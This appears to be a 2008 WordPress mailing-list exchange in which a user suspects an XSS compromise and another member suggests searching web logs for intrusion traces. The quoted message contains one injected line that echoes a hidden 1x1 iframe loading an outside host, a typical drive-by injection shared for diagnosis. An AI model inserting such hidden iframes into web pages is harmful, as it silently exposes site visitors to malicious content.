[wp-hackers] XSS vuln in wordpress 2.7 ?

madalin niladam at gmail.com
Mon Dec 22 19:10:56 GMT 2008


I've looked in the logs and i found no information..

I am using CENTOS 5.2 x86_64 :)


Thanks.

On Mon, Dec 22, 2008 at 9:06 PM, Jess Planck <jess at funroe.net> wrote:
> That sux. You started picking through your web logs to see if it came
> through your publicly accessible website? Sometimes you can check error and
> weblogs and look for unusual request strings to determine if the exploit
> came through a vulnerable web application. In some cases the intruder will
> cleanup behind themselves. Unfortunately sometimes the exploits don't
> produce anything log-able.
>
> If they do cleanup, you may notice missing times in log files. At least that
> can give you a time frame if you didn't figure that out from the
> modification stamp on the files.
>
> I didn't notice if you mentioned the server platform. Other WP-Hackers may
> be able to offer some diagnostic tools for your server type.
>
>
> On Dec 22, 2008, at 12:39 PM, madalin wrote:
>
>> // echo "<iframe src=\"http://thedeadpit.com/?click=17470781\" width=1
>> height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
>
> _______________________________________________
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-hackers
>


More information about the wp-hackers mailing list